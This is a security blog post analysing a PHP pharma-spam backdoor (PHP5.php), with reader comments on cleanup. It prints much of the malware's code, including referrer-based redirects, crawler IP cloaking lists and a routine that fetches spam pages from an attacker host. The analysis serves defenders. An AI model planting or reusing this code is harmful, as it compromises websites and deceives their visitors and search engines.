Pharma Hack Backdoor Analyzed – PHP5.PHP

Some of you might remember my last Pharma hack post, Intelligent (Pharma) SPAM Decoded, today I will spend some time looking a different variant of the same infection type but focus on a payload that is not encoded or embedded within an existing file, instead it resides in its own file – PHP5.php.

“Hmm, maybe it’s a good / system file, it does have PHP in it, I won’t bother looking at it…”

If you have ever come across this file and find yourself thinking this, we highly encourage you not to and take a minute to see if any of its components resemble what we’re about to share.

Dissecting the Payload

1. Online Store

The first thing that pops out when looking at the code is the introduction of the online store. The following snippet creates an array with different product names and terms.

Depending on the $_SERVER[“HTTP_REFERER”] and the term used the malware redirects the USER to an online store which is likely being controlled by the attacker to generate revenue – an example of an monetized attack.

<?php
$keyspat = array(
‘adobe creative suite 5.5 master collection’,
‘microsoft windows 7 ultimate’,
‘microsoft office 2010 professional plus’,
‘adobe acrobat x pro’,

‘microsoft’,
‘soft’ => ‘adobe’,
‘cheap’ => ‘adobe’,
‘price’ => ‘adobe’,
‘order’ => ‘adobe’,
‘sale’ => ‘adobe’,
‘buy’ => ‘adobe’,
‘professional’ => ‘adobe’,
‘system’ => ‘adobe’,
);

$rfrr = urldecode($_SERVER[“HTTP_REFERER”]);
foreach ($keyspat as $k => $v)
{
if (is_int($k))
{
if (stripos($rfrr,$v))
{
header(“Location: http://outlet-programs.net/browse/search/?q=”.$v);
exit;
}
}
else
{
if (stripos($rfrr,$k))
{
header(“Location: http://outlet-programs.net/browse/search/?q=”.$v);
exit;
}
}
}
?&rt;

2. Home Sweet Home

The next thing you notice is the creation of its own little home away from home on the targets environment, how cute…

<?php
$adm_url = ‘http://tdsinto.net/big/gtxt.php?pg=';
$page_upd_time = 60*60*24;//1 day
$empty_upd_time = 60*60*24*10;//10 days

error_reporting(0);

if (isset($_POST[‘test_mode’]) && $_POST[‘test_mode’]==1)
{
if (!is_dir(‘tmp’))
{
$res = mkdir(‘tmp’);
if ($res===false) {exit(‘Folder create error’);}
@chmod(‘tmp’,0777);
}

@file_put_contents(‘tmp/1′,’123′);
if (!is_file(‘tmp/1′)) {exit(‘File create error’);}
@unlink(‘tmp/1′);
exit(‘All ok’);

}

If specific conditions are met via a $_POST variable (test_mode), the attacker can set up the environment to host their SPAM.

From the snippet above you can see the script checking that the tmp directory exists on the server, if it doesn’t it creates it and sets its permissions to 777 (read, write, execute to owner, group and others). It then verifies full control of the directory by creating a file inside the directory for further use.

I like that, its own built-in unit testing, how nice. It’s good to see that even the developers with malicious intent follow good SDLC best practice.

3. Avoiding Automatic Detection (Crawlers)

The following snippet is a very clever in its intent.

$stop_ips_masks = array(
“66.249.[6-9][0-9].[0-9]+”, // Google NetRange: 66.249.64.0 – 66.249.95.255
“74.125.[0-9]+.[0-9]+”, // Google NetRange: 74.125.0.0 – 74.125.255.255
“65.5[2-5].[0-9]+.[0-9]+”, // MSN NetRange: 65.52.0.0 – 65.55.255.255,
“74.6.[0-9]+.[0-9]+”, // Yahoo NetRange: 74.6.0.0 – 74.6.255.255
“67.195.[0-9]+.[0-9]+”, // Yahoo#2 NetRange: 67.195.0.0 – 67.195.255.255
“72.30.[0-9]+.[0-9]+”, // Yahoo#3 NetRange: 72.30.0.0 – 72.30.255.255
“38.[0-9]+.[0-9]+.[0-9]+”, // Cuill: NetRange: 38.0.0.0 – 38.255.255.255
“93.172.94.227”, // MacFinder
“212.100.250.218”, // Wells Search II
“71.165.223.134”, // Indy Library
“70.91.180.25”,
“65.93.62.242”, “74.193.246.129”, “213.144.15.38”, “195.92.229.2”, …
“165.160.2.20”, “89.122.224.230”, “66.230.175.124”, “218.18.174.27”, …
…..
“91.187.103.152”,
“208.80.74.7”,
“207.164.79.6”,
“89.149.253.169”);

In it, the attacker tries to avoid being detected and blocked by web crawlers. Again, you can see a fairly significant range of IP’s, next to them you also see that the attacker was generous enough to tell us which IP’s belong to who.

4. Cherry on Top

And as the grand finale, you’ll find the code that actually downloads the payload to the environment to begin distribution.

The malware is downloaded to the tmp directory using a number of encoded(md5) files, each with SPAM injected within the files. Inside you will find the URL with the content being declared in the $adm_url. It also recognizes the importance of staying updated and checks to make sure it is, if its not, it updates itself.

Finally, it uses keywords as a condition, if the conditions are met, then it redirects the visitors to Canadian Pharma medication.

$our_page = strtolower(‘http://’.str_replace(‘www.’,”,$_SERVER[‘HTTP_HOST’])…
$request_md5 = md5(strtolower($_SERVER[‘REQUEST_URI’]));

if (!is_file(‘tmp/’.$request_md5))
{
if (is_dir(‘tmp/’))
{
file_put_contents(‘tmp/’.$request_md5,gpvvv3($adm_url.urlencode($our_page)));
clearstatcache();
}
}

if (is_file(‘tmp/’.$request_md5))
{
$f_time = time() – filemtime($file_tmp_name);

if (filesize(‘tmp/’.$request_md5)==0)
{
if ($f_time > $empty_upd_time)
{
file_put_contents(‘tmp/’.$request_md5,gpvvv3($adm_url.urlencode($our_page)));
}
return ;
}

if ($f_time > $page_upd_time)
{
$cnttt = gpvvv3($adm_url.urlencode($our_page));
file_put_contents(‘tmp/’.$request_md5,$cnttt);
if (empty($cnttt)) {return ;}
unset($cnttt);
}

$is_bot = FALSE ;
foreach ( $stop_ips_masks as $k=>$v )
{
if (preg_match( ‘#^’.$v.’$#’, $_SERVER[‘REMOTE_ADDR’])){ $is_bot = TRUE ;break;}
}
if ($is_bot === true) {echo file_get_contents(‘tmp/’.$request_md5); exit;}

$xxx = preg_replace( $user_agent_to_filter, ‘-NO-WAY-‘, $_SERVER[‘HTTP_USER_AGENT’] );
if( strpos( $xxx, ‘-NO-WAY-‘ ) !== FALSE) {echo file_get_contents(‘tmp/’.$request_md5); exit;}

if (!empty($_SERVER[‘HTTP_USER_AGENT’]))
{
if ( preg_match ( ‘#google|msn|bing|live|altavista|ask|yahoo|aol#i’, $_SERVER[‘HTTP_REFERER’] ) )
{
if ( preg_match( ‘#[&?][pq]=([^&]+)#i’, $_SERVER[‘HTTP_REFERER’] , $match ) )
{
$keyword = $match[1] ;
if ( preg_match (‘/accutane|ACCUTANE|Accutane/i’,$keyword))
{
echo <<
HTML;
exit;
}
}
}
}
}

function gpvvv3($url)
{
if (function_exists(‘curl_init’))
{
$ch = curl_init();
curl_setopt($ch, 13, 10);
curl_setopt($ch, 10002, $url);
curl_setopt($ch, 19913, true);
$some_content = curl_exec($ch);
curl_close($ch);
}
else
{
$some_content = file_get_contents($url);
}
return $some_content;
}

As you can see the Pharma hack continues to evolve, its not just a matter of injecting a site with links to viagra, the entire game has changed. From the validation of permissions, to the encoding of payloads, to the conditional nature of displays; it certainly a level of sophistication that warrants a little bit of respect and appreciation.


If you have any questions let us know at info@sucuri.net

About Rodrigo Escobar

Rodrigo is the Remediation Team Lead at Sucuri and his diet consists of web-based malware in the morning, backdoors in the afternoon and security research in the evening. Follow him on Twitter at @ipaxdc.

  • http://arthurklein.com theGuruWithin

    is it enough to delete php5.php file or is there more to trashing this virus?

    • Rodrigo Escobar

      Hello Arthur,

      There is more than just deleting the php5 file. That script creates the tmp directory mentioned above with all the encoded SPAM. Those are also part of the malicious code and should be removed as well.

  • http://arthurklein.com theGuruWithin

    BTW i just moved one of my sites to WPEngine  so good to know that you are protecting them/us

  • Pingback: Links | PyrroPyrro()

  • Vid Luther

    Are there any known attack vectors for this? Things to look for in our logs to see if someone is attempting to put this file on systems?

    • Chris

       I would also like to know the answer to this question.

    • Stergios

      The attack vector can be any vulnerability like SQL injection remote file inclusion(RFI) local file inclusion(LFI) unpatched servers, wrong folder and file permissions etc.

      Generally there is NO connection between the type of the attack(e.g. PHARMA HACK) and the attack vector. In one installation could be achieved from a secuirty hole in plugin X and in other installation by exploiting a different vulnerability in a Theme Y

  • thuantta

    Our WP site just got attacked by this variant. I’ve deleted the entire WP installation and reinstalled it but reusing the same DB that I had. The next day the hack seems to have reappeared as our Google listing still shows our site with references to drugs so it seems cleaning a hacked WP is even more troublesome. Have you been able to clean out your DB to fully get rid of the hack?

    • http://qstudio.us/ Q Studio

      takes a good while for those Google links to clear up – from experience…

  • Doan

    My site just got hacked, i was cleaned it but it still come back , i scan all my file for malware script, it inject to many type ( wp-config.php, wp-blog-header, wp-load … and include actual script from another places from plugin folder and themes folder ) This is the malware script http://textsnip.com/21e1e5 , I dont know how it come back…

  • http://www.worldwealthbuilders.com/hard-money-lenders-in-canada.html Navtaj Chandhoke

    Our website is continuously attack. No matter how often we clean, it keeps coming back.any suggestions to get rid forever???

    • http://www.facebook.com/people/Jim-Walker/100000736622420 Jim Walker

      First step is to break the website into it’s own solitary account. That way eliminating the possibility other sites sharing the same account are the actual root of the compromise. After that, it’s just a matter of installing the virgin files from the developers source website, then securing that nicely.

  • Stergios

    Hi,
    The site of my client has been infected from a vatiant of PHARMA HACK. I managed to clean it up and (finding the backdoors /tmp with malicious files etc). However I cannot cope well with the malicious cached links that I can find by doing site:cleintsite.com. The query returns about 4000 results which 90% of them are spammy queries like
    clientsite.com/?jezeyi=buy_praga_….. buy_Louis_Vitton… Buy_cheap_something etc. I have set htaccess to return a 410 gone for every query that starts with jezeyi and also at webmastes tools I configured that jezeyi parameter does not affect the content delivered. However I cannot see any drop to the number of that links for about five days now except one day that they dropped to 3700 but they recoverd to 4000. Does anybody has any suggestion on how to remove that spammy links?

  • Cameron

    I’ve deleted the offending files, changed all passwords (FTP, database, wordpress, etc), changed .htaccess permissions, etc.. the php5.php keeps coming back. I don’t have any other compromised sites on my account – only one other wordpress installation on this account and it’s clean. How does the hack keep coming back???

    • Stergios

      Probably from the same security hole that came in the first place. Update core and 3rd party plugins to the latest version also. By changing the passwords if the attacker did not used compromised credentials you cannot leave him out.

  • Pat Wright

    How do you get rid of it?

  • http://sucuri.net Tony Perez

    If it were only that easy, honestly though, really hard to say without knowing more about the environment.

    Thanks

Share This